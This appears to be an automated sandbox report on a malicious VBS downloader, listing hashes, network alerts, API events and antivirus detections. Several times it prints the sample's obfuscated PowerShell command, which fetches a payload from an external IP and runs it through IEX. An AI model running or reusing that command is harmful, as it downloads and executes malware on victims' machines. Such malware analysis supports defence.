Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 11, 2023, 10:01 a.m.	July 11, 2023, 10:03 a.m.

Size	2.8KB
Type	ASCII text
MD5	`77b99c19d7f1d83eba555f7415a70986`
SHA256	`36261a8aa46dec95e6ee9e63200fe06b9970e83a70f8e6717ac207ba78036829`
CRC32	`856F0BEE`
ssdeep	`48:BxHpJgGGPfENbw4FGeqUlJLEHa8Rc7IPO9UaAAE:LrgFME4FGklJMROvo`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\into.txt.vbs
2584
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cmdWithDelim= '(N~~ew-O~~bject N~~~et.W~~e~~~bC~~l~~~ie~~nt).D~~~~o~~wnl~o~~a~~dS~~tr~~i~~n~~g(''http://45.12.253.107:222/d.png'')';IEX ($cmdWithDelim-Replace '~','') | IEX
  2664

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.157.162.126	Active	Moloch
45.12.253.107	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 45.12.253.107:222 -> 192.168.56.101:49164	2035769	ET HUNTING [TW] Likely Hex Executable String	Misc activity
TCP 45.12.253.107:222 -> 192.168.56.101:49164	2020482	ET WEB_CLIENT DRIVEBY GENERIC ShellExecute in Hex No Seps	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 11, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 11, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 11, 2023, 10 a.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 11, 2023, 10 a.m.	buffer: Invoke-Expression : Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW July 11, 2023, 10 a.m.	buffer: At line:1 char:174 console_handle: 0x0000002f	1	1
WriteConsoleW July 11, 2023, 10 a.m.	buffer: + $cmdWithDelim= '(N~~ew-O~~bject N~~~et.W~~e~~~bC~~l~~~ie~~nt).D~~~~o~~wnl~o~~ console_handle: 0x0000003b	1	1
WriteConsoleW July 11, 2023, 10 a.m.	buffer: a~~dS~~tr~~i~~n~~g(''http://45.12.253.107:222/d.png'')';IEX ($cmdWithDelim-Repl console_handle: 0x00000047	1	1
WriteConsoleW July 11, 2023, 10 a.m.	buffer: ace '~','') \| IEX <<<< console_handle: 0x00000053	1	1
WriteConsoleW July 11, 2023, 10 a.m.	buffer: + CategoryInfo : ParserError: ((:String) [Invoke-Expression], Par console_handle: 0x0000005f	1	1
WriteConsoleW July 11, 2023, 10 a.m.	buffer: seException console_handle: 0x0000006b	1	1
WriteConsoleW July 11, 2023, 10 a.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In console_handle: 0x00000077	1	1
WriteConsoleW July 11, 2023, 10 a.m.	buffer: vokeExpressionCommand console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040af90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040ac10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0040b450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 11, 2023, 10 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 155 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72521000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72522000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02991000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02992000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02737000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02728000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 10 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cmdWithDelim= '(N~~ew-O~~bject N~~~et.W~~e~~~bC~~l~~~ie~~nt).D~~~~o~~wnl~o~~a~~dS~~tr~~i~~n~~g(''http://45.12.253.107:222/d.png'')';IEX ($cmdWithDelim-Replace '~','') \| IEX
cmdline	powershell $cmdWithDelim= '(N~~ew-O~~bject N~~~et.W~~e~~~bC~~l~~~ie~~nt).D~~~~o~~wnl~o~~a~~dS~~tr~~i~~n~~g(''http://45.12.253.107:222/d.png'')';IEX ($cmdWithDelim-Replace '~','') \| IEX

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 11, 2023, 10 a.m.	show_type: 0 filepath_r: powershell parameters: $cmdWithDelim= '(N~~ew-O~~bject N~~~et.W~~e~~~bC~~l~~~ie~~nt).D~~~~o~~wnl~o~~a~~dS~~tr~~i~~n~~g(''http://45.12.253.107:222/d.png'')';IEX ($cmdWithDelim-Replace '~','') \| IEX filepath: powershell	1	1	0

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Symantec	ISB.Downloader!gen464
Kaspersky	HEUR:Trojan.Script.Generic
Microsoft	Trojan:Script/Wacatac.B!ml
ZoneAlarm	HEUR:Trojan.Script.Generic

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 11, 2023, 10 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (4 events)

